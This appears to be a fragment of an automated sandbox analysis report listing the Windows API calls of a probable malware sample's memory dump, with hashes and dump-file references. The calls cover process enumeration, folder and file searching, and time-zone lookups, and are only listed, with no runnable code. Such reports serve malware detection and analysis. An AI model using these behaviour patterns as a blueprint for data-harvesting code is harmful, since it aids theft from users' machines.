                                  • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                  • Instruction ID: c4aeeb568c1a8f470d762f21aff52fe2944f437a3cbd1194caa2a65a9c3127ed
                                  • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                  • Instruction Fuzzy Hash: D9318D71911218ABCB25EF94CC44FEEB779EF49740F104199E10AA22A4DB346E84CFA1
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                  • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                  • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • CloseHandle.KERNEL32(?), ref: 00418761
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1066202413-0
                                  • Opcode ID: 32a2c00083ef1341ac2e94a31bec5813c048ea59ad7237cf6e44a6152b238793
                                  • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                  • Opcode Fuzzy Hash: 32a2c00083ef1341ac2e94a31bec5813c048ea59ad7237cf6e44a6152b238793
                                  • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                  • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                  • lstrcatA.KERNEL32(?,007501B8), ref: 00414FAB
                                  • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: a80d5c8847ed11b1c06e57bc1001b675e7378c4db45037d7255a816d075cb529
                                  • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                  • Opcode Fuzzy Hash: a80d5c8847ed11b1c06e57bc1001b675e7378c4db45037d7255a816d075cb529
                                  • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                  • wsprintfA.USER32 ref: 00418850
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 2716131235-2206825331
                                  • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                  • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                  • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                  • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID:
                                  • API String ID: 3407564107-0
                                  • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                  • Instruction ID: 3e1b386fc31f2828bba7cd81e44318231eec21304d57b4317c4e66f22dafacb9
                                  • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                  • Instruction Fuzzy Hash: 96116D74910209EFCB04DFE4D958AEDBBB5FF04345F008469E80967254E7706B14CF65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022B7C17
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B7C1E
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022B7C2B
                                  • wsprintfA.USER32 ref: 022B7C5A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 377395780-0
                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction ID: d61d34decaa7733073be9633ef3fd04516a56283373c216a5ffcd334ced4f1fe
                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction Fuzzy Hash: 281139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280D3795940CBB1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                  • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                  • wsprintfA.USER32 ref: 004179F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocLocalProcessTimewsprintf
                                  • String ID:
                                  • API String ID: 1243822799-0
                                  • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                  • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                  • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022B7CCA
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B7CD1
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022B7CE4
                                  • wsprintfA.USER32 ref: 022B7D1E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction ID: e997e13061aea18072df47f7d0bc2c1a594ab8149c7c23972c878929c60c7c11
                                  • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                  • Instruction Fuzzy Hash: 7F118EB1A45218EFEB208B94DC49FA9B7B8FB45761F1003AAF50AA32C0C7741940CF51
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strtok_s
                                  • String ID:
                                  • API String ID: 3330995566-0
                                  • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                  • Instruction ID: 01a9b7a7a8af1c975fd22df0597b2a4179c66a8fd817e20c4bb9fb7b3cc80747
                                  • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                  • Instruction Fuzzy Hash: B01125B0E1020AEFCB15CFE6D848BEEB7B5BF08344F00C028E025A6254D7749500CF55
                                  APIs
                                  • CreateFileA.KERNEL32(022B3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022B3D55,?), ref: 022B9563
                                  • GetFileSizeEx.KERNEL32(000000FF,022B3D55), ref: 022B9580
                                  • CloseHandle.KERNEL32(000000FF), ref: 022B958E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction ID: e22498c1e1b2eb9eb8b4e2c666e97aff94a920312759ff42a5eb5b5a618af8c2
                                  • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                  • Instruction Fuzzy Hash: 90F04F39E90208BBDB20DFF0DC49BDE77BAEB49750F11C654FA11A7284D67596418F40
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D31
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022B6D4F
                                  • CloseHandle.KERNEL32(00000000), ref: 022B6D60
                                  • Sleep.KERNEL32(00001770), ref: 022B6D6B
                                  • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022B6D81
                                  • ExitProcess.KERNEL32 ref: 022B6D89
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                  • Instruction ID: c3ac85b88bba904712d3295d1f6c401210080f876bc8e8e584b8af163f61a835
                                  • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                  • Instruction Fuzzy Hash: C0F05E78A60307AEE712ABE1DC08BFD767AEF05781F105618F502A5194CBF05140CA56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: `o@
                                  • API String ID: 0-590292170
                                  • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                  • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                  • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                  • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: SystemTimelstrcpy
                                  • String ID: cI@$cI@
                                  • API String ID: 62757014-1697673767
                                  • Opcode ID: 08129ed12c23d3f194c50dc719ff5aadd717ee4d4a74a7574ffe3a5ba5cd9d49
                                  • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                                  • Opcode Fuzzy Hash: 08129ed12c23d3f194c50dc719ff5aadd717ee4d4a74a7574ffe3a5ba5cd9d49
                                  • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                                  APIs
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                                  • lstrcatA.KERNEL32(?,00782610), ref: 004150A8
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                                  • String ID: aA
                                  • API String ID: 2699682494-2567749500
                                  • Opcode ID: bf6810f96eb53610a0959d854b70e6bb1317e91cfa13314e8862e500998e2eb1
                                  • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                                  • Opcode Fuzzy Hash: bf6810f96eb53610a0959d854b70e6bb1317e91cfa13314e8862e500998e2eb1
                                  • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022AA094
                                  • lstrlen.KERNEL32(00000000), ref: 022ABF06
                                    • Part of subcall function 022B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022B90B9
                                  • StrStrA.SHLWAPI(00000000,004213E0), ref: 022ABF34
                                  • lstrlen.KERNEL32(00000000), ref: 022AC00C
                                  • lstrlen.KERNEL32(00000000), ref: 022AC020
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                  • String ID:
                                  • API String ID: 1440504306-0
                                  • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                  • Instruction ID: 11ae1bff34aaa77961843076bef4d5c2147441a91ad80ccc7645f673f0fb5037
                                  • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                                  • Instruction Fuzzy Hash: 1EB14F71920308ABCB19FBE4DD95EEE733AAF25340F504159E506A2198EF386B48CF61
                                  APIs
                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                                  • FindClose.KERNEL32(000000FF), ref: 00413C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFileNextlstrcat
                                  • String ID: !=A
                                  • API String ID: 3840410801-2919091325
                                  • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                  • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                                  • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                                  • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                                  APIs
                                    • Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B51E1
                                  • lstrcat.KERNEL32(?,00421070), ref: 022B51FE
                                  • lstrcat.KERNEL32(?,0064A5F8), ref: 022B5212
                                  • lstrcat.KERNEL32(?,00421074), ref: 022B5224
                                    • Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4B93
                                    • Part of subcall function 022B4B77: FindFirstFileA.KERNEL32(?,?), ref: 022B4BAA
                                    • Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022B4BD8
                                    • Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022B4BEE
                                    • Part of subcall function 022B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022B4DE4
                                    • Part of subcall function 022B4B77: FindClose.KERNEL32(000000FF), ref: 022B4DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                  • Instruction ID: dcba65082af861546ab149da75ec443b607c48d8ff3f7ce7734fff1f80496424
                                  • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                                  • Instruction Fuzzy Hash: 1B21927AA50208ABC714FBE0DC45EE9337AAB55300F404589A68992184DE7496C9CFA2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpynlstrlenwsprintf
                                  • String ID:
                                  • API String ID: 1206339513-0
                                  • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction ID: c1bc07eefdb889a03e5b14cb0cea3a0d188a3ac37e622edcd8980fe397766342
                                  • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                                  • Instruction Fuzzy Hash: C201DA79540109FFCB04DFECD998EAE7BBAEF49394F108148F90A9B305C635AA40DB95